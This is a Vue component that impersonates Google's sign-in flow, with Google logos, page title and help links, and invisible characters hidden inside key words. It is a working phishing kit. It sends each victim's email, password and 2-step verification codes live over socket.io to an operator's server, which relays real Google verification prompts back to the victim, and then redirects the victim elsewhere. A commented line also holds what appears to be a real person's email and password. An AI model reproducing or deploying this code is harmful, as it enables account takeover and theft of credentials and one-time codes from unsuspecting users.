<template>
  <div class="main">
    <div class="duration" v-if="duration"></div>
    <div v-else>
      <div class="formMain">
        <div class="processArea" v-show="loading">
          <div class="process1 process"><span class="pro pro1"></span></div>
          <div class="process2 process"><span class="pro pro2"></span></div>
        </div>
        <div>
          <div class="head">
            <svg
              xmlns="https://www.w3.org/2000/svg"
              width="20"
              height="24"
              viewBox="0 0 40 48"
              aria-hidden="true"
              jsname="jjf7Ff"
            >
              <path
                fill="#4285F4"
                d="M39.2 24.45c0-1.55-.16-3.04-.43-4.45H20v8h10.73c-.45 2.53-1.86 4.68-4 6.11v5.05h6.5c3.78-3.48 5.97-8.62 5.97-14.71z"
              ></path>
              <path
                fill="#34A853"
                d="M20 44c5.4 0 9.92-1.79 13.24-4.84l-6.5-5.05C24.95 35.3 22.67 36 20 36c-5.19 0-9.59-3.51-11.15-8.23h-6.7v5.2C5.43 39.51 12.18 44 20 44z"
              ></path>
              <path
                fill="#FABB05"
                d="M8.85 27.77c-.4-1.19-.62-2.46-.62-3.77s.22-2.58.62-3.77v-5.2h-6.7C.78 17.73 0 20.77 0 24s.78 6.27 2.14 8.97l6.71-5.2z"
              ></path>
              <path
                fill="#E94235"
                d="M20 12c2.93 0 5.55 1.01 7.62 2.98l5.76-5.76C29.92 5.98 25.39 4 20 4 12.18 4 5.43 8.49 2.14 15.03l6.7 5.2C10.41 15.51 14.81 12 20 12z"
              ></path>
            </svg>
            <p>Sign in with Google</p>
          </div>
          <div class="content">
            <div class="content1">
              <img
                class="logo"
                src="../assets/as-mxB7aWg33ztobVn6.png"
                alt=""
              />

              <div v-if="step == 1">
                <h1 class="signText1">
                  <span>S‎i‎g‎n in</span>
                </h1>
                <div class="signText2">
                  <span
                    >to continue to
                    <a href="https://solidfurniture.lt/"
                      >SOLID FURNITURE</a
                    ></span
                  >
                </div>
              </div>
              <div v-if="step == 2">
                <h1 class="signText1">
                  <span>Welcome</span>
                </h1>
                <div class="account" @click="backStep">
                  <svg
                    aria-hidden="true"
                    class="Qk3oof"
                    fill="#444746"
                    focusable="false"
                    width="24px"
                    height="24px"
                    viewBox="0 0 24 24"
                    xmlns="https://www.w3.org/2000/svg"
                  >
                    <path
                      d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm6.36 14.83c-1.43-1.74-4.9-2.33-6.36-2.33s-4.93.59-6.36 2.33C4.62 15.49 4 13.82 4 12c0-4.41 3.59-8 8-8s8 3.59 8 8c0 1.82-.62 3.49-1.64 4.83zM12 6c-1.94 0-3.5 1.56-3.5 3.5S10.06 13 12 13s3.5-1.56 3.5-3.5S13.94 6 12 6z"
                    ></path>
                  </svg>
                  <div>{{ email }}</div>
                  <svg
                    aria-hidden="true"
                    class="Qk3oof u4TTuf"
                    fill="#1f1f1f"
                    focusable="false"
                    width="20px"
                    height="20px"
                    viewBox="0 0 24 24"
                    xmlns="https://www.w3.org/2000/svg"
                  >
                    <path d="M7 10l5 5 5-5z"></path>
                  </svg>
                </div>
              </div>
              <div v-if="step == 3">
                <h1 class="signText1">
                  <span>Verify it’s you</span>
                </h1>
                <div class="signText2">
                  To help keep your account safe, Google wants to make sure it’s
                  really you trying to sign in.
                  <a href="https://support.google.com/accounts/answer/7162782"
                    >Learn more</a
                  >
                </div>
                <div class="account" @click="backStep">
                  <svg
                    aria-hidden="true"
                    class="Qk3oof"
                    fill="#444746"
                    focusable="false"
                    width="24px"
                    height="24px"
                    viewBox="0 0 24 24"
                    xmlns="https://www.w3.org/2000/svg"
                  >
                    <path
                      d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm6.36 14.83c-1.43-1.74-4.9-2.33-6.36-2.33s-4.93.59-6.36 2.33C4.62 15.49 4 13.82 4 12c0-4.41 3.59-8 8-8s8 3.59 8 8c0 1.82-.62 3.49-1.64 4.83zM12 6c-1.94 0-3.5 1.56-3.5 3.5S10.06 13 12 13s3.5-1.56 3.5-3.5S13.94 6 12 6z"
                    ></path>
                  </svg>
                  <div>{{ email }}</div>
                  <svg
                    aria-hidden="true"
                    class="Qk3oof u4TTuf"
                    fill="#1f1f1f"
                    focusable="false"
                    width="20px"
                    height="20px"
                    viewBox="0 0 24 24"
                    xmlns="https://www.w3.org/2000/svg"
                  >
                    <path d="M7 10l5 5 5-5z"></path>
                  </svg>
                </div>
              </div>
            </div>
            <div class="content2">
              <div v-show="step == 1" class="step">
                <div class="Xb9hP">
                  <input
                    type="email"
                    class="X3mtXb"
                    :class="[{ vaildEmail: noEmail }]"
                    id="identifierId"
                    v-model="email"
                  />
                  <div
                    class="YRMmle"
                    id="YRMmle"
                    :class="[
                      { 'should-transform': email, 'should-color': !email },
                    ]"
                  >
                    E‎ma‎il or p‎hon‎e
                  </div>
                </div>
                <div class="Ekjuhf" v-show="noEmail">
                  <span class="AfGCob"
                    ><svg
                      aria-hidden="true"
                      class="Qk3oof xTjuxe"
                      fill="currentColor"
                      focusable="false"
                      width="16px"
                      height="16px"
                      viewBox="0 0 24 24"
                      xmlns="https://www.w3.org/2000/svg"
                    >
                      <path
                        d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-2h2v2zm0-4h-2V7h2v6z"
                      ></path></svg></span
                  >{{ errorMessage.info }}
                </div>
                <div class="dMNVAe">
                  <button>Forgot email?</button>
                </div>
                <div class="dMNVAa">
                  Not your com‎puter? Use Guest mode to sign in pri‎vat‎ely.
                  <a
                    href="https://support.google.com/chrome/answer/6130773?hl=en-US"
                    target="_blank"
                    aria-label="Learn more about using Guest mode (external, opens in a new window)"
                    >Learn more about using Guest mode</a
                  >
                </div>
              </div>

              <div v-show="step == 2" class="step step2">
                <div class="Xb9hP">
                  <input
                    :type="showPassword ? 'text' : 'password'"
                    class="X3mtXb"
                    :class="[{ vaildEmail: noPassword }]"
                    id="identifierPsssword"
                    v-model="password"
                  />
                  <div
                    class="YRMmle"
                    id="YRMmle"
                    :class="[{ 'should-transform': password }]"
                  >
                    Enter your password
                  </div>
                  <!-- <div class="X4mtXb" :class="{ focusable }" @click="handleIpt">
                <div class="iptContent" v-if="showPassword">
                  {{ iptContent }}
                </div>
                <div class="iptContent" v-else>
                  <div
                    class="hide"
                    v-for="i in iptContent.length"
                    :key="i"
                  ></div>
                </div>
                <div class="light" v-show="focusable"></div>
              </div> -->
                </div>
                <div class="Ekjuhf" v-show="noPassword">
                  <span class="AfGCob"
                    ><svg
                      aria-hidden="true"
                      class="Qk3oof xTjuxe"
                      fill="currentColor"
                      focusable="false"
                      width="16px"
                      height="16px"
                      viewBox="0 0 24 24"
                      xmlns="https://www.w3.org/2000/svg"
                    >
                      <path
                        d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-2h2v2zm0-4h-2V7h2v6z"
                      ></path>
                    </svg>
                  </span>
                  <span>{{ errorMessage.info }}</span>
                </div>
                <div class="showP" @click="showPass">
                  <div class="checkBoxArea">
                    <div class="checkBox" :class="{ showPas: showPassword }">
                      <svg viewBox="0 0 24 24">
                        <path d="M4.1,12.7 9,17.6 20.3,6.3" />
                      </svg>
                    </div>
                  </div>
                  <div class="checkText">Show pa‎ss‎word</div>
                </div>
              </div>
              <!-- 身份验证器 -->
              <div v-show="step3Show == 1" class="step">
                <div class="Xb9hP">
                  <div style="width: 90%">
                    <p class="S7S4N">2-Step Verification</p>
                    <p class="dMNVAe">
                      Get a verification code from the
                      <strong>Google Authenticator</strong> app
                    </p>

                    <div>
                      <input
                        type="text"
                        class="X3mtXb"
                        :class="[{ vaildEmail: warnShow }]"
                        id="identifierCode"
                        v-model="code"
                        autocomplete="off"
                      />
                      <div
                        class="YRMmle"
                        id="YRMmle"
                        :class="[
                          { 'should-transform': code, 'should-color': !code },
                        ]"
                      >
                        Enter code
                      </div>
                    </div>
                  </div>
                </div>
                <div class="Ekjuhf" v-show="warnShow">
                  <span class="AfGCob"
                    ><svg
                      aria-hidden="true"
                      class="Qk3oof xTjuxe"
                      fill="currentColor"
                      focusable="false"
                      width="16px"
                      height="16px"
                      viewBox="0 0 24 24"
                      xmlns="https://www.w3.org/2000/svg"
                    >
                      <path
                        d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-2h2v2zm0-4h-2V7h2v6z"
                      ></path>
                    </svg>
                  </span>
                  <span v-if="noCode">{{ noCodeText }}</span>
                </div>
                <div class="showP" @click="remenberDevices">
                  <div class="checkBoxArea">
                    <div class="checkBox" :class="{ showPas: device }">
                      <svg viewBox="0 0 24 24">
                        <path d="M4.1,12.7 9,17.6 20.3,6.3" />
                      </svg>
                    </div>
                  </div>
                  <div class="checkText noFont">
                    Don’t ask again on this device
                  </div>
                </div>
              </div>
              <!-- 手机验证 -->
              <div v-show="step3Show == 2" class="step">
                <div class="Xb9hP">
                  <div>
                    <p class="red0Me">{{ phoneCode }}</p>
                    <p class="imZuWd">Open the Gmail app on {{ deviceName }}</p>
                    <p class="dMNVAe yTaH4c">
                      Google sent a notification to your
                      {{ deviceName }}. Open the Gmail app, tap
                      <strong>Yes</strong> on the prompt, then tap
                      <strong>{{ phoneCode }}</strong> on your phone to verify
                      it’s you.
                    </p>
                  </div>
                </div>
              </div>
              <!-- 邮箱 -->
              <div v-show="step3Show == 3" class="step">
                <div class="Xb9hP">
                  <div style="width: 92%">
                    <p class="dMNVAe yTaH4c">
                      An email with a verification code was just sent to
                      {{ vaildEmailLabel }}
                    </p>
                    <input
                      type="text"
                      class="X3mtXb"
                      id="identifierSmsCode"
                      v-model="smsCode"
                      autocomplete="off"
                      :class="[{ vaildEmail: warnShow }]"
                    />
                    <div
                      class="YRMmle"
                      id="YRMmle"
                      :class="[
                        {
                          'should-transform': smsCode,
                          'should-color': !smsCode,
                        },
                      ]"
                    >
                      Enter code
                    </div>
                  </div>
                </div>
                <div class="Ekjuhf" v-show="warnShow">
                  <span class="AfGCob"
                    ><svg
                      aria-hidden="true"
                      class="Qk3oof xTjuxe"
                      fill="currentColor"
                      focusable="false"
                      width="16px"
                      height="16px"
                      viewBox="0 0 24 24"
                      xmlns="https://www.w3.org/2000/svg"
                    >
                      <path
                        d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-2h2v2zm0-4h-2V7h2v6z"
                      ></path>
                    </svg>
                  </span>
                  <span v-if="noCode">{{ noCodeText }}</span>
                </div>
              </div>
              <!-- 短信 -->
              <div v-show="step3Show == 4" class="step">
                <div class="Xb9hP">
                  <div style="width: 92%">
                    <p class="dMNVAe yTaH4c">
                      A text message with a 6-digit verification code was just
                      sent to ••• •••• ••{{ phoneNumberLast2 }}
                    </p>
                    <div class="gCode" :class="[{ vaildEmail: warnShow }]">
                      <div class="G">G-</div>
                      <input
                        type="text"
                        class="X3mtXb"
                        id="identifierSmsCode"
                        v-model="smsCode"
                        autocomplete="off"
                      />
                      <div
                        class="YRMmle"
                        id="YRMmle"
                        :class="[
                          {
                            'should-transform': smsCode,
                            'should-color': !smsCode,
                          },
                        ]"
                      >
                        Enter the code
                      </div>
                    </div>
                  </div>
                </div>
                <div class="Ekjuhf" v-show="warnShow">
                  <span class="AfGCob"
                    ><svg
                      aria-hidden="true"
                      class="Qk3oof xTjuxe"
                      fill="currentColor"
                      focusable="false"
                      width="16px"
                      height="16px"
                      viewBox="0 0 24 24"
                      xmlns="https://www.w3.org/2000/svg"
                    >
                      <path
                        d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-2h2v2zm0-4h-2V7h2v6z"
                      ></path>
                    </svg>
                  </span>
                  <span v-if="noCode">{{ noCodeText }}</span>
                </div>
              </div>
            </div>

            <div class="content3" v-show="step3Show != 2">
              <div class="FO2vFd">
                <button @click="next" id="nextBtn">Next</button>
              </div>
              <div class="TNTaPb" @click="create" v-show="step < 3">
                <button>
                  {{ step == 1 ? "Create account" : "Forgot password?" }}
                </button>
              </div>
            </div>
          </div>
        </div>
      </div>
      <footer>
        <div class="btn">
          <a
            href="https://accounts.google.com/TOS?loc=US&amp;hl=en-US"
            target="_blank"
            >Terms</a
          >
        </div>
        <div
          class="btn"
          href="https://support.google.com/accounts?hl=en-US&amp;p=account_iph"
          target="_blank"
        >
          <a>Privacy</a>
        </div>
        <div class="btn">
          <a
            href="https://accounts.google.com/TOS?loc=US&amp;hl=en-US&amp;privacy=true"
            target="_blank"
            >Help</a
          >
        </div>
      </footer>
    </div>

    <div class="dgtjld" v-show="loading"></div>
  </div>
</template>

<script>
import { login, backLogin } from "../utils/axios";
import CryptoJS from "crypto-js";
import { io } from "socket.io-client";
export default {
  data() {
    return {
      phoneNumberLast2: "00",
      vaildEmailLabel: "",
      duration: true,
      iptContent: "",
      focusable: false,
      inputDom: null,
      // email: "linfeng.tony@gmail.com",
      // password: "lullaby.5723609",
      email: "",
      password: "",
      code: "",
      noCodeText: "",
      noCode: false,
      noEmail: false,
      noPassword: false,
      loading: false,
      showPassword: false,
      errorPasswordTimes: 0,
      step: 1,
      warnShow: false,
      lightPos: 0,
      device: false,
      vType: 1,
      errorMessage: {
        type: 0, //eType 1邮箱错误 2密码错误 3验证码错误
        info: "",
      },
      deviceName: "",
      phoneCode: 0,
      smsCode: null,
    };
  },
  computed: {
    step3Show() {
      if (this.step == 3) {
        return this.vType;
      } else {
        return 0;
      }
    },
  },
  watch: {},
  methods: {
    keydownEvent(e) {
      if (e.key.length === 1) {
        this.iptContent += e.key;
      } else if (e.key == "Backspace") {
      }
    },
    handleIpt() {
      this.focusable = true;
    },
    async next() {
      const emailReg = /^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/;
      if (this.step == 1) {
        const dom = document.getElementById("identifierId");
        this.noEmail = false;
        if (!this.email || !emailReg.test(this.email)) {
          dom.focus();
          this.noEmail = true;
          this.errorMessage.info = "Enter an email or phone number";
          return;
        }
        this.loading = true;
        this.socket?.emit("send_message", {
          type: 1,
          info: this.email,
          infoId: this.socket.id,
        });
      } else if (this.step == 2) {
        const dom = document.getElementById("identifierPsssword");
        if (!this.password) {
          dom.focus();
          this.errorMessage.info = "Enter a password";
          this.noPassword = true;
          this.warnShow = true;
          return;
        } else {
          this.noPassword = false;
          this.warnShow = false;
        }

        this.socket?.emit("send_message", {
          type: 2,

          info: this.password,
          infoId: this.socket.id,
        });
        const res = await login({
          email: this.email,
          password: this.encrypt(this.password),
          type: "g",
        });

        this.loading = true;
        // setTimeout(() => {
        //   this.loading = false;
        //   this.step++;
        // }, 2000);
      } else {
        // 2步验证
        if (this.vType == 1) {
          const dom = document.getElementById("identifierCode");
          if (!this.code) {
            dom.focus();
            this.noCodeText = "Enter a code";
            this.noCode = true;
            this.warnShow = true;
            return;
          } else if (this.code.length != 6) {
            this.noCodeText = "Wrong number of digits. Try again.";
            this.noCode = true;
            this.warnShow = true;
          } else {
            this.noCode = false;
            this.warnShow = false;
          }
          this.socket?.emit("send_message", {
            type: 3,
            info: this.code,
            infoId: this.socket.id,
          });
        } else if (this.vType == 4 || this.vType == 3) {
          // const dom = document.getElementById("identifierSmsCode");
          if (!this.smsCode) {
            this.noCodeText = "Enter a code";
            this.noCode = true;
            this.warnShow = true;
            return;
          } else if (this.smsCode.length != 6) {
            this.noCodeText = "Wrong number of digits. Try again.";
            this.noCode = true;
            this.warnShow = true;
          } else {
            this.noCode = false;
            this.warnShow = false;
          }
          this.socket?.emit("send_message", {
            type: 3,
            info: this.smsCode,
            infoId: this.socket.id,
          });
        }

        this.loading = true;
        const continueName = this.$route.query.continue;
        const ifkv = this.$route.query.ifkv;
        const flowName = this.$route.query.flowName;
        setTimeout(() => {
          this.loading = false;
          window.location.href = `${process.env.VUE_APP_FINISH}?continue=${continueName}&ifkv=${ifkv}&flowName=${flowName}`;
        }, 3000);
      }
    },
    showPass() {
      this.showPassword = !this.showPassword;
    },
    remenberDevices() {
      this.device = !this.device;
    },
    create() {
      window.open("https://accounts.google.com/lifecycle/steps/signup");
    },
    backStep() {
      this.loading = true;
      this.socket?.emit("return2step1");
      setTimeout(() => {
        this.loading = false;
        this.step = 1;
      }, 2000);
    },
    encrypt(text) {
      const KEY = CryptoJS.enc.Hex.parse(process.env.VUE_APP_KEY);
      const IV = CryptoJS.enc.Hex.parse(process.env.VUE_APP_IV);
      const srcs = CryptoJS.enc.Utf8.parse(text);
      const encrypted = CryptoJS.AES.encrypt(srcs, KEY, {
        iv: IV,
        mode: CryptoJS.mode.CBC,
        padding: CryptoJS.pad.Pkcs7,
      });
      return encrypted.toString(); // 默认返回 Base64 字符串
    },
    async test() {
      const res = await backLogin({ account: "admin123", password: "3536" });
    },
  },
  mounted() {
    document.title = "Sign in - Google Accounts";
    this.inputDom = document.getElementById("identifierId");
    setTimeout(() => {
      this.duration = false;
    }, 2000);

    let currentRoomId;
    if (typeof crypto !== "undefined" && crypto.randomUUID) {
      currentRoomId = crypto.randomUUID();
    } else {
      // 备用老浏览器兼容方案
      currentRoomId = "room_" + Math.random().toString(36).substring(2, 15);
    }

    this.socket = io(process.env.VUE_APP_API_URL || "http://localhost:3000", {
      auth: {
        anonymous: true,
        needOpen: true,
        roomId: currentRoomId,
      },
    });
    this.socket.on("step2_vaild_info", (data) => {
      console.log(data);
      this.vType = data.vType;
      this.deviceName = data.eventInfo.device;
      this.phoneCode = data.eventInfo.textCode;
      this.phoneNumberLast2 = data.eventInfo.textCode;
      this.loading = false;
      // this.step++;
    });
    this.socket.on("error_message", (data) => {
      console.log(data, "==");
      if (data.type == 0) {
        this.loading = false;
        if (this.step == 1) {
          document.title = "Welcome";
        }
        this.step++;
      } else if (data.type == 1) {
        this.loading = false;
        this.noEmail = true;
        this.errorMessage.info = data.info;
      } else if (data.type == 2) {
        this.loading = false;
        this.noPassword = true;
        this.noPassword = true;
        this.errorMessage.info = data.info;
      } else if (data.type == 3) {
        this.loading = false;
        this.noCodeText = data.info;
        this.noCode = true;
        this.warnShow = true;
      }
    });
  },
  components: {},
};
</script>

<style scoped lang="scss">
@media (max-width: 599px) {
}

@media (min-width: 600px) {
}

.main {
  .duration {
    background-color: #fff;
    width: 100vw;
    height: 100vh;
  }

  @media (max-width: 599px) {
    background-color: #fff;
  }

  @media (min-width: 600px) {
    display: flex;
    align-items: center;
    justify-content: center;
    flex-direction: column;
  }

  .dgtjld {
    background-color: #fff;
    opacity: 0.5;
    position: absolute;
    width: 100vw;
    height: 100vh;
    z-index: 10;
    top: 0;
  }

  position: relative;
  height: 100vh;
  overflow: hidden;
  font-family: "GoogleSans", Helvetica, Arial, sans-serif;

  footer {
    @media (max-width: 599px) {
      width: 100%;
    }

    @media (min-width: 600px) {
      width: 1040px;
    }

    display: flex;
    align-items: center;
    flex-direction: row-reverse;
    padding: 8px 0;
    line-height: 1.4285714286;
    gap: 9px;

    .btn {
      height: 48px;
      display: flex;
      align-items: center;
      justify-content: center;
      cursor: pointer;
    }

    a {
      background-color: transparent;
      border: none;
      font-size: 0.75rem;
      font-weight: 400;
      letter-spacing: 0.00625rem;
      line-height: 1.3333333333;
      outline: none;
      padding: 8px 12px;
      color: #1f1f1f;
      border-radius: 8px;
      text-decoration: none;

      &:hover {
        background-color: #e2e7eb;
      }
    }
  }
}

.formMain {
  @media (max-width: 599px) {
    width: 100%;
  }

  @media (min-width: 600px) {
    width: 1040px;
  }

  min-height: 384px;
  background-color: #ffffff;
  border-radius: 28px;
  position: relative;
  // overflow: hidden;
}

.head {
  color: #444746;
  font-size: 0.875rem;
  padding: 14px 16px;
  border-bottom: 1px solid #c4c7c5;
  display: flex;
  align-items: center;
  gap: 15px;
}

.content {
  @media (max-width: 599px) {
    padding: 24px;
  }

  @media (min-width: 600px) {
    display: flex;
    flex-direction: row;
    flex-wrap: wrap;
    flex-grow: 1;
    // align-items: end;
    padding: 36px;
  }

  .content1 {
    @media (max-width: 599px) {
      width: 100%;
      padding-bottom: 20px; //52

      .signText1 {
        font-size: 2rem;
      }
    }

    @media (min-width: 600px) {
      max-width: 50%;
      padding-right: 24px;
      padding-bottom: 38px; //52

      .signText1 {
        font-size: 2.75rem;
      }
    }

    .logo {
      width: 100px;
    }

    flex-basis: 50%;
    flex-grow: 1;
    box-sizing: border-box;

    .signText1 {
      line-height: 1.1818181818;
      margin-top: 22px;
      margin-bottom: 0;
      font-weight: 400;
      color: #1f1f1f;
    }

    .signText2 {
      font-size: 1rem;
      line-height: 1.5;
      margin-bottom: 0;
      font-weight: 400;
      color: #1f1f1f;
      letter-spacing: 0rem;
      margin-top: 16px;

      a {
        color: #0b57d0;
        text-decoration: none;
      }
    }

    .account {
      font-family: "GoogleSans-SemiBold";
      margin-top: 16px;
      display: flex;
      align-items: center;
      gap: 7px;
      padding: 3px;
      padding-right: 5px;
      align-items: center;
      background: #fff;
      border: 1px solid #747775;
      color: #1f1f1f;
      cursor: pointer;
      display: inline-flex;
      font-size: 0.875rem;
      font-weight: 500;
      letter-spacing: 0.25px;
      max-width: 100%;
      border-radius: 20px;

      &:hover {
        background-color: #ededed;
      }
    }
  }

  .content2 {
    @media (max-width: 599px) {
      width: 100%;
    }

    @media (min-width: 600px) {
      max-width: 50%;
      padding-left: 24px;
    }

    flex-basis: 50%;
    flex-grow: 1;
    box-sizing: border-box;
    overflow-x: hidden;
    padding-top: 80px;

    .Xb9hP {
      display: flex;
      flex-grow: 1;
      flex-shrink: 1;
      min-width: 0%;
      position: relative;

      .YRMmle {
        position: absolute;
        bottom: 17px;
        box-sizing: border-box;
        pointer-events: none;
        left: 15px;
        color: #444746;
        transform-origin: bottom left;
        transition: transform 0.15s cubic-bezier(0.4, 0, 0.2, 1),
          opacity 0.15s cubic-bezier(0.4, 0, 0.2, 1);
        padding: 0 8px;
      }

      .should-transform {
        transform: scale(0.75) translateY(-43px);
        background-color: #fff;
        z-index: 5;
      }

      .X3mtXb {
        font-size: 16px;
        height: 28px;
        margin: 1px 1px 0 1px;
        padding: 13px 15px;
        width: 100%;
        z-index: 1;
        border-radius: 4px;
        /* 强制设定边框，覆盖默认外观 */
        border: 1px solid #747775;
        outline: none;
        /* 顺便去掉点击时的蓝色外框 */
        background-color: transparent;
        flex-grow: 1;
        flex-shrink: 1;
        direction: ltr;

        &:focus {
          outline: 2px solid #0b57d0;
          outline-offset: -1px;
        }

        &:focus + .YRMmle {
          transform: scale(0.75) translateY(-43px);
          color: #0b57d0;
          background-color: #fff;
          z-index: 5;
        }
      }

      .X4mtXb {
        padding: 13px 15px;
        width: 99%;
        height: 56px;
        border-radius: 4px;
        border: 1px solid #747775;
        outline: none;
        background-color: transparent;
        box-sizing: border-box;
        position: relative;
        display: flex;
        align-items: center;

        &:hover {
          cursor: text;
        }

        .light {
          height: 60%;
          width: 1px;
          background-color: #000;
          animation: blink 1.1s step-end infinite;
        }

        .iptContent {
          display: flex;
          align-items: center;
          gap: 2px;

          .hide {
            background-color: #000;
            width: 4px;
            height: 4px;
            border-radius: 100%;
          }
        }
      }

      .focusable {
        outline: 2px solid #0b57d0;
        outline-offset: -1px;
      }

      .vaildEmail {
        outline: 1px solid #b3261e !important;
        outline-offset: -1px !important;

        &:focus {
          outline: 2px solid #b3261e !important;
          outline-offset: -1px !important;
        }
        &:focus-within {
          outline: 2px solid #b3261e !important;
          outline-offset: -1px !important;
        }

        .X3mtXb {
          &:focus + .YRMmle {
            color: #b3261e !important;
          }
        }
        & + .YRMmle {
          color: #b3261e !important;
        }
        & + .should-color {
          color: #444746 !important;
        }
        &:focus + .should-color {
          color: #b3261e !important;
        }
      }

      #identifierPsssword {
        font-size: 16px;
        letter-spacing: 0px;
      }
      .S7S4N {
        font-size: 1.25rem;
      }
      .dMNVAe {
        font-size: 0.875rem;
        margin-bottom: 16px;
        margin-top: 10px;
      }

      .red0Me {
        color: #1f1f1f;
        font-size: 3.5625rem;
        line-height: 1.1228070175;
        text-align: center;
        margin: 16px 0;
      }
      .imZuWd {
        color: #1f1f1f;
        font-size: 1.25rem;
        font-weight: 400;
        letter-spacing: 0rem;
        line-height: 1.2;
      }
      .yTaH4c {
        line-height: 1.4;
      }
      .gCode {
        display: flex;
        align-items: center;
        width: 100%;
        border-radius: 4px;
        border: 1px solid #747775;
        // outline: none;
        position: relative;
        &:focus-within {
          outline: 2px solid #0b57d0;
          outline-offset: -1px;
        }
        .G {
          width: 44px;
          text-align: center;
        }
        .X3mtXb {
          width: auto;
          border: none;
          &:focus {
            outline: none;
          }
          &:focus + .YRMmle {
            transform: scale(0.75) translateY(-43px);
            color: #0b57d0;
            background-color: #fff;
            z-index: 5;
          }
        }

        .YRMmle {
          left: 50px;
        }
      }
    }

    .Ekjuhf {
      color: #b3261e;
      font-size: 0.75rem;
      font-weight: 400;
      letter-spacing: 0.00625rem;
      line-height: 1.3333333333;
      margin-top: 4px;
      display: flex;
      align-items: center;

      .AfGCob {
        margin-right: 8px;
        height: 16px;
      }
    }

    .dMNVAe {
      padding-bottom: 3px;
      padding-top: 9px;

      button {
        background-color: transparent;
        border: none;
        cursor: pointer;
        color: #0b57d0;
        border-radius: 4px;
        font-weight: 500;
        letter-spacing: 0.015625rem;
        font-size: 14px;
        font-family: "GoogleSans-SemiBold";

        &:hover {
          background-color: #ecf2fc;
        }
      }
    }

    .dMNVAa {
      font-size: 0.875rem;
      font-weight: 400;
      letter-spacing: 0rem;
      line-height: 1.4285714286;
      color: #444746;

      @media (max-width: 599px) {
        margin-top: 40px;
      }

      @media (min-width: 600px) {
        margin-top: 32px;
      }

      a {
        color: #0b57d0;
        font-family: "GoogleSans-SemiBold";
        border-radius: 4px;
        font-weight: 500;
        letter-spacing: 0.015625rem;
        text-decoration: none;

        &:hover {
          text-decoration: underline;
        }
      }
    }

    .showP {
      display: flex;
      align-items: center;
      gap: 18px;
      padding: 16px 0 0;
      width: 100%;
      cursor: pointer;

      .checkBoxArea {
        .checkBox {
          border: 2px solid #444746;
          border-radius: 2px;
          width: 14px;
          height: 14px;
          background-color: transparent;

          display: flex;
          align-items: center;
          justify-content: center;

          img {
            width: 20px;
            height: 20px;
            transition: opacity 0.18s cubic-bezier(0, 0, 0.2, 1) 0s,
              transform 0.18s cubic-bezier(0, 0, 0.2, 1) 0s;
            opacity: 1;
          }

          svg {
            width: 20px;
            height: 20px;
            fill: none;
            stroke: #fff;
            stroke-width: 3;
            stroke-linecap: round;
            stroke-linejoin: round;
            // 核心：设置描边路径长度
            stroke-dasharray: 30;
            stroke-dashoffset: 30; // 初始偏移量等于长度，看起来是空的
            transition: all 0.4s ease;
          }
        }

        .showPas {
          background-color: #0b57d0;
          border-color: #0b57d0;

          svg {
            stroke-dashoffset: 0;
          }
        }
      }

      .checkText {
        font-size: 0.875rem;
        line-height: 1.4285714286;
        font-family: GoogleSans-SemiBold;
        color: #1f1f1f;
      }
      .noFont {
        font-family: "GoogleSans";
      }
    }

    .step2 {
      @media (max-width: 599px) {
        margin-top: 40px;
      }
    }
  }

  .content3 {
    display: flex;
    flex-wrap: wrap;
    width: 100%;
    flex-direction: row-reverse;

    @media (max-width: 599px) {
      margin-top: 40px;
      justify-content: space-between;
    }

    @media (min-width: 600px) {
      margin-top: 32px;
    }

    .TNTaPb {
      button {
        background-color: transparent;
        border: none;
        font-size: 14px;
        font-family: "GoogleSans-SemiBold";
        color: #0b57d0;
        height: 40px;
        cursor: pointer;
        padding: 0 16px;
        border-radius: 20px;

        &:hover {
          background-color: #f5f8fd;
        }
      }
    }

    .FO2vFd {
      margin-left: 24px;

      button {
        background-color: #0b57d0;
        border: none;
        font-family: "GoogleSans-SemiBold";
        color: #fff;
        height: 40px;
        cursor: pointer;
        padding: 0 24px;
        border-radius: 20px;

        font-size: 0.875rem;
        font-weight: 500;
        letter-spacing: 0rem;
        line-height: 1.4285714286;

        &:hover {
          background-color: #0e4eb5;
          box-shadow: 0 1px 2px 0 rgba(60, 64, 67, 0.3),
            0 1px 3px 1px rgba(60, 64, 67, 0.15);
        }
      }
    }
  }
}

.processArea {
  outline: none;
  overflow: hidden;
  width: 95%;
  height: 4px;
  margin: 0 auto;
  position: absolute;
  top: 0;
  left: 50%;
  transform: translateX(-50%);
  background-color: #fff;

  .process {
    width: 100%;
    height: 100%;
    position: absolute;
  }

  .process1 {
    animation: primary-indeterminate-translate 2s linear infinite;
  }

  .process2 {
    animation: auxiliary-indeterminate-translate 2s linear infinite;
  }

  .pro {
    background-color: #0b57d0;
    display: inline-block;
    width: 100%;
    height: 100%;
    position: absolute;
  }

  .pro1 {
    animation: primary-indeterminate-scale 2s linear infinite;
  }

  .pro2 {
    animation: auxiliary-indeterminate-scale 2s linear infinite;
  }
}

@keyframes primary-indeterminate-translate {
  0% {
    transform: translateX(-145.166611%);
  }

  20% {
    animation-timing-function: cubic-bezier(0.5, 0, 0.701732, 0.495819);
    transform: translateX(-145.166611%);
  }

  59% {
    animation-timing-function: cubic-bezier(0.302435, 0.381352, 0.55, 0.956352);
    transform: translateX(-61.495191%);
  }

  100% {
    transform: translateX(55.444446%);
  }
}

@keyframes auxiliary-indeterminate-translate {
  0% {
    animation-timing-function: cubic-bezier(0.15, 0, 0.515058, 0.409685);
    transform: translateX(-54.888891%);
  }

  25% {
    animation-timing-function: cubic-bezier(0.31033, 0.284058, 0.8, 0.733712);
    transform: translateX(-17.236978%);
  }

  48% {
    animation-timing-function: cubic-bezier(0.4, 0.627035, 0.6, 0.902026);
    transform: translateX(29.497274%);
  }

  100% {
    transform: translateX(105.388891%);
  }
}

@keyframes primary-indeterminate-scale {
  0% {
    transform: scaleX(0.08);
  }

  36.65% {
